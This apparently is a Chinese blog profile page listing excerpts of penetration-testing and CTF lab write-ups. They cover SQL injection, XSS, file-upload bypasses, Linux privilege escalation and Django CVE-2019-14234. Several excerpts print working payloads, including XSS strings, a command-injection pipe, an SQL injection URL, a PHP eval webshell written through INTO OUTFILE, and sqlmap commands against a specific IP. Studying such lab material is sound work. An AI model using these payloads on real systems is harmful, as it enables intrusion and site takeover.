- 博客(38)
- 收藏
- 关注
原创 vulntarget-b记录(Sliver学习)
这里尝试了 re ,毒刺,ew 都不太行(应该是我操作姿势不对)后来发现通过iox代理工具可以获取到一个稳定的流量转发隧道。vulntarget\administrator:Admin@123、(首次登陆要改密码修改为Admin@123@)把这个马子传入web服务靶机上,开启http服务,使用刚才植入的webshell利用蚁剑下载这个马子。配置浏览器代理 下图的192.168.1.104 是边界靶机IP,上边的命令也是在边界靶机中运行。发现 10.0.10.99/24 网段,而且发现处于域环境。
2024-06-04 16:56:40
1004
原创 PHPSTUDY xss+csrf RCE漏洞
产生的原因是,小皮面板管理后台会显示登录信息,会将用户登录失败的信息也显示出来,且未进行任何过滤。而且小皮面板有一个计划任务的功能,可以实现命令执行因此存在rce漏洞。最近小皮面板爆出来一个高位的RCE漏洞,跟风赶紧来复现一下。在用户名输入框输入xss测试语句,密码随便填登录。安装成功会弹出一个”小皮面板初始信息.txt“安装小皮面板,下载完安装包后傻瓜式一键安装。起一个http服务,构造csrf poc。在用户登录框插入xss payload。
2023-02-08 18:15:48
596
原创 sql注入(sqli-labs-master)1~10
利用concat将updatexml函数和group_concat函数的字符传拼接成一条查询语句。可以盲注也可以利用updatexml函数显示错误信息来进行注入。利用group_concat函数查询所有表名。查询user和password字段。和第五关一样将单引号换成双引号。判断表长(以第四张表为例子)查看数据库名和数据库版本。查询users中的列名。查询username字段。也一样单引号和括号闭合。和第一关注入方法一样。
2022-10-05 16:08:57
350
原创 .htaccess AND .user.ini文件构成的PHP后门
比如,某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。那么什么是.user.ini?
2022-09-23 16:32:37
256
原创 利用for循环+foreach来获取数组中的最大值的下标
在 index.php 定义函数 getMax,调用该函数传入 $array ,echo输出 $array 中最大值的下标。该函数使用逻辑判断可以做到查询出任意传入的一维数组的最大值的下标。(2)在函数外部,调用该函数,参数是 $array , 将返回值赋值给变量$max。(1)定义函数 getMax,函数接受一个一维数组(值不重复)参数。该结果通过 return 方式返回。(3)输出变量$max。
2022-09-11 15:11:04
2430
原创 php foreach遍历二维数组(任意数量的子数组,子数组有任意多个键值) 求和。
在 index.php 定义函数 getSum,该函数用来计算二维数组(任意数量的子数组,子数组有任意多个键值)中所有数字之和。(1)定义函数 getSum,函数接受一个二维数组参数,将二维数组遍历取得所有数字之和。该结果通过 return 方式返回。(2)在函数外部,调用该函数,参数是 $array , 将返回值赋值给变量$sum。(3)输出变量$sum。
2022-09-11 15:07:23
691
原创 lampiao靶机-脏牛提权
dirb扫描出来很多敏感目录,泄露许多敏感信息。发现有很多漏洞,sql注入了,远程代码执行什么的。访问80端口没什么收获,访问1898端口。发现没有sudo提权可以使用的命令。Drupal7框架。拿到root账户密码。...
2022-07-18 12:16:01
1385
原创 DC-2靶机 wordpress框架渗透 +su 提权
kali内置的有WPScan是针对于wordpress网站的攻击工具。是一款采用开发的应用程序,你可以给它的爬虫指定。地址和爬取深度,还可以添额外的外部链接,接下来。显然最后一个flag在root权限中,需要提权。得到三个用户名创建user.txt写入。会给你返回一个字典文件,然后可以用于密码破解。,但具有额外的安全层来实施这些限制。靶机IP192.168.3.127。通过vi得到flag3,flag4。利用dirb进行一波敏感目录爆破。使用sudo提权中的git提权。-uuser用户名。...
2022-07-17 23:16:10
1431
原创 使用图片包含php代码 。绕过对文件内容检测的文件上传的waf
先随便新建一个图片:然后我把它放在我的kali里边。用vi查看一下内容:箭头所指的是图片的文件头格式。为了避免解析失败,将除去文件头的内容删去。.按esc输入开始到结束的行数+d可实现快速删除指定内容。 保存并退出。 在1.php中准备好代码。.cat 1.php >> 2.png 将1php的内容复制在2.png的内容后边。 现在我们用PHP解析一下 2.png代码执行成功。这样就可以绕过对文件内容检测的文件上传的waf了。仅供学习参考,请勿用于非法用途。...
2022-06-16 18:35:59
821
原创 文件上传漏洞,之00截断。
上传一个shell.png.jpg文件。然后在png后加一个空格方便再二进制查找位置。找到代表空格的20,我们将20改为00这个时候png后边就会存在一个看不见的字符。放包,使其上传。文件上传成功,成功绕过前端验证,修改了上传文件的类型。同样方法成功上传PHP文件。...
2022-06-16 16:39:05
1161
原创 CTFHUB 端口扫描
题目提示内网端口扫描我们想访问内网的本机回环地址。响应码200,访问成功提示8000-9000的端口:奈何burp用的不六,治好另寻他路:我用python简单构造一个for循环脚本:函数range常用于for循环中,range() 函数可创建一个整数列表.他是左开右闭类型的。for i in range(8000,9001): print(i)此函数可以打印出8000-9000的数字。然后复制下来,放到burp里边爆破...
2022-06-09 20:28:41
813
原创 重置目标密码漏洞
验证码覆盖.重置个人密码时,存在多种注入攻击方式。重置密码常用手机验证码验证,这时候我们打开两个重置密码的页面,第一个用自己的账户,第二个用于目标账户。现在目标页面输入账户后点击获得验证码。再用自己账户也输入账户,点击获得验证码。随后将自己账户的验证码,输入在目标页面。服务器判断短信验证码是否正确的方法:判断POST传递的短信验证码和SESSION中传递的短信吗是否一致,如果一致则重置用户密码。当服务器端判断时,POST传递的code的值,第二个会覆盖第一个所接受的值,因此第二个的账
2022-05-15 10:54:02
188
原创 XSS漏洞详解以及绕过方式。
下列以dvwa靶场为例:反射性XSS:LOW级别<script>alert('test')</script>最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。medium级别可能过滤了js标签,我们使用input标签,<input onblur=alert`1`>当input失去焦点时会触发<input onclick=alert `123'> 当input获取焦点(点击输入)时触发
2022-05-14 22:50:40
1590
原创 django-cve_2019_14234漏洞
出现报错说明语句执行成功再次构造payload因为or1=1永远为真得到所有用户http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20
2022-05-13 12:56:03
657
原创 命令执行漏洞,详解。
介绍漏洞:应用程序有时需要调用一些执行函数,如php中,使用system,exec,shell_exec,pasthur,popen,proc,proc_popen等函数可以执行系统命令,当黑客操控这些函数时,就可以将可以命令拼接在正常命令中,从而造成执行命令攻击。下列以dvwa靶场为例进行介绍。windows系统管道符命令;”|“:直接执行后边的语句。 例如:ping 127.0.0.1|whoami"||":如果前边的执行语句为假则执行后边的语句,前边语句只能为假。 例如:ping
2022-04-30 09:42:46
1934
原创 文件上传漏洞,详解。
为什么存在文件上传漏洞。。。:上传文件时,服务器未对,上传文件的后缀做出具体规范。导致可以上传任意的文件类型。JS 绕过检测攻击上传文件时javascirpt在客户端会对后缀名进行检测。这时候可以在burp中抓包修改后缀,绕过客户端的js检测。文件后缀 绕过检测攻击。文件后缀时服务器中的代码,对文件后缀做出了一些检测和限制。但是apache会对一些文件的后缀名允许上传。例如http.conf。如果配置中有一下代码,则能够解析成php和html文件。所以可以上传一个ph..
2022-04-29 14:57:20
1333
原创 ctf.show web3
打开题目,出现提示,php文件?,考虑文件包含漏洞。输入参数:?url=/etc/passwd这个报错界面出来了,说明存在文件包含漏洞构造url值 =php://input 使用php协议使用burp抓包使用ls命令查看php下的文件得到文件路径。。。。使用cat方法查看最终得到flag。。。。。。。。发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
2022-04-25 21:26:20
1570
原创 union注入攻击之dvwa靶场实战演练(union秒懂教程)
第一步,我们来分析是否存在字符型注入点:1、id=1 返回正常。2、id=1' 返回错误3、id=1 and 1=1 “1=1” 为真返回正常4、id=1 and 1=2 “1=2”为假返回错误。测试符合这四个条件,证明该位置存在字符型注入点漏洞。//原理分析:因为字符型的注入点不同于数字型 数字型注入点 后台的php传参点格式为 id=$字符型则为 'id=$' 有两个引号下面以dvwa靶场进行实验演示我们输入1'# 来使'i...
2022-04-19 18:43:01
1264
原创 sqlmap注入命令大全
sqlmap -u "注入点地址" --dbs扫描数据库"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables 打开数据库中的 ”joomla表格sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fiel...
2022-04-17 10:54:58
3023
原创 CTF Web_php_unserialize 详细解题过程
打开靶场地址,我们看到是一个php代码我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件扫描可以得出该网站下的文件,我将它复制在记事本中发现一个数据库网站获取到账号为root密码为空登录数据库,在SQL出编写一句话木马,并执行。SELECT "<?php eval(@$_POST['pass']); ?>"INTO OUTFILE '/tmp/test1.php'接下来我们使用中国蚁剑,链接我们所编写的木马,SELECT "&
2022-04-16 00:18:44
3391
原创 渗透第一步之DNS信息收集技巧。
正向查询:首先 最简单最快速的是,使用ping命令输入域名来获取其ip地址。或者,使用nslookup命令来指定域名获取ip地址。Server:192.168.90.83 #DNS服务器Address:192.168.90.83# #我们解析到的ip地址。Name : #我们解析的域名。或者使用,DIG命令:dig 域名dig 域名 any (加any意思为查询所有可以查询的到的)反向查询:dig -x ip地址 得出域名PTR XXXXXXX PT.
2022-04-11 13:32:01
3389
原创 sqlmap注入详解(joomla案例)
我们以该网站为例:我们需要先找到其报错注入点:再次要注意:报错注入点中的 ‘ [] ’ 符号是不能为sqlmap所识别的。我们所需要将其转换为url编码。之后进入正题打开kali并开启root权限,利用sqlmap扫描其数据库。--dbs这时候我们得到了该网站的五个表。我们进入joomla表中。-D joomla --tables之后我们进入#__users列中并指定想要获取的信息。这时候便得到了我们想要的账户,密码,以及邮箱。此密码经过加密,解密..
2022-04-01 19:50:53
2808
原创 HTML代码集
最常用,推荐使用) in(英寸) cm(厘米) mm(毫米) pt(点)。 2.font-family属性 设置字体 网页中常用的字体有宋体,微软雅黑,黑体等....。 3.font-weight属性 用于设置字体的粗细 nomal(默认值,定义标准的字符) bold(定义粗体字符) bolder(定义更粗的字符) lighter(定义更细的字符) 100-900(100的整数倍)=定义由细到粗的字符,其中400等于nomal,700等于bold,越大越粗。4.font-style属性 用于定义文字风格
2022-03-17 20:14:41
757
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人